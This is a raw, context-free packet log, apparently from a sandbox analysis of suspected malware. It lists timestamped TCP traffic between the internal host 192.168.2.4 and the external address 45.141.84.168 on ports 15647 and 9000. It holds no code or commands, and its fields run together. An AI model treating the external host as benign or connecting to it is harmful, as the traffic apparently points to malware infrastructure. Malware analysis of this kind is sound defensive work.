                                          Nov 28, 2024 13:40:42.891381025 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.891410112 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.891475916 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.911053896 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.911139011 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.911267042 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.911282063 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.911324024 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.911350012 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.919770002 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.919823885 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.922621012 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.933171988 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.933253050 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.946655989 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.946747065 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.955487013 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.955558062 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.961918116 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.961956024 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.961987019 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.965532064 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.965596914 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.966650009 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.966738939 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.976584911 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.976625919 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.976726055 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.990751982 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:42.990839958 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:42.990885019 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.004143000 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.004216909 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.013827085 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.013931036 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.027782917 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.028019905 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.033365965 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.033463955 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.034888029 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.034971952 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.036883116 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.036951065 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.044543982 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.044631958 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.057991028 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.058092117 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.069158077 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.069209099 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.069252014 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.081965923 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.082093954 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.085274935 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.085371017 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.086750984 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.086823940 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.090097904 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.090166092 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.090183973 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.092365980 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.092499971 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.111252069 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.111332893 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.112428904 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.112493038 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.112529039 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.121480942 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.121553898 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.133528948 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.133642912 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.147520065 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.147618055 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.147644997 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.148924112 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.148993015 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.155024052 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.155114889 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.157167912 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.157228947 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.165409088 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.165479898 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.166640997 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.166702986 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.168006897 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.168119907 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.183144093 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.189472914 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.189565897 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.190192938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.190251112 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.190289021 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.205689907 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.205702066 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.205756903 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.205770016 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.206784010 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.212549925 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.212601900 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.228358984 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.228370905 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.228518009 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.232733965 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.233136892 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.253559113 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.253627062 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.254702091 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.254725933 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.254745007 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.254761934 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.261744022 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.261843920 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.261863947 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.269269943 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.269329071 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.276370049 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.276484013 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.277389050 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.283210039 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.283288956 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.288402081 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.288592100 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.297971010 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.298028946 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.303297043 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.303355932 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.310216904 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.310282946 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.312297106 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.312345028 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.323282957 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.323337078 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.325752974 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.325848103 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.335519075 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.335551023 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.335578918 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.344043970 CET90004987345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.344124079 CET90004987345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.344167948 CET498739000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.344310045 CET498739000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.348932981 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.349003077 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.366029024 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.366348982 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.366411924 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.378382921 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.378454924 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.378469944 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.389262915 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.389326096 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.403551102 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.403640032 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.403697014 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.403754950 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.411789894 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.411905050 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.411927938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.423683882 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.423810959 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.432262897 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.432334900 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.432396889 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.432445049 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.432533979 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.432584047 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.446404934 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.446464062 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.455136061 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.455202103 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.455205917 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.455637932 CET498799000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.462735891 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.462910891 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.466181040 CET90004987345.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.469896078 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.469964027 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.477802992 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.477883101 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.487327099 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.487389088 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.488064051 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.501137972 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.501183987 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.501219988 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.511534929 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.511723995 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.527157068 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.527340889 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.533871889 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.533967972 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.549149990 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.552301884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.552383900 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.561582088 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.561680079 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.561860085 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.561917067 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.574919939 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.575010061 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.575594902 CET90004987945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.575803995 CET498799000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.575903893 CET498799000192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.583257914 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.583338976 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.590531111 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.590596914 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.590624094 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.598388910 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.598438978 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.618607044 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.620073080 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.620125055 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.620143890 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.625052929 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.625093937 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.625148058 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.631647110 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.631711960 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.644961119 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.645031929 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.645037889 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.647542953 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.647600889 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.662534952 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.669130087 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.669272900 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.671679020 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.671741962 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.671776056 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.672903061 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.672957897 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.681644917 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.681883097 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.688381910 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.688447952 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.695728064 CET90004987945.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.703346014 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.703474998 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.710768938 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.710859060 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.723690987 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.726042032 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.726120949 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.739392042 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.739474058 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.745724916 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.745795012 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.746171951 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.746249914 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.753627062 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.753781080 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.762681007 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.762769938 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.767664909 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.767766953 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.776700020 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.776803017 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.782561064 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.782641888 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.791604042 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.791702032 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.792959929 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.793024063 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.808571100 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.808643103 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.822040081 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.823177099 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.831041098 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.831127882 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.832808971 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.832879066 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.843735933 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.843836069 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.848737955 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.848824024 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.848855019 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.848911047 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.856534004 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.859066963 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.865942955 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.866036892 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.872920036 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.872978926 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.882781982 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.882869005 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.882955074 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.883003950 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.896399975 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.896521091 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.902617931 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.902710915 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.904854059 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.904943943 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.913182020 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.928709030 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.928811073 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.941462994 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.941518068 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.941534042 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.942316055 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.942408085 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.943588972 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.952796936 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.952877998 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.963977098 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.963987112 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.964081049 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.969058037 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.969126940 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.969130993 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.970072985 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.970124960 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.983860970 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.984049082 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:43.990711927 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:43.990783930 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.002886057 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.002952099 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.003235102 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.003279924 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.003393888 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.023000956 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.023060083 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.024871111 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.024957895 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.045253038 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.045320988 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.057686090 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.057753086 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.062403917 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.073506117 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.073566914 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.075001001 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.075041056 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.084234953 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.084342003 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.084359884 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.091655016 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.091707945 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.098330021 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.098419905 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.098454952 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.104342937 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.104387999 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.113576889 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.117199898 CET156474973045.141.84.168192.168.2.4
                                          Nov 28, 2024 13:40:44.117238998 CET4973015647192.168.2.445.141.84.168
                                          Nov 28, 2024 13:40:44.117276907 CET156474973045.141.84.168192.168.2.4
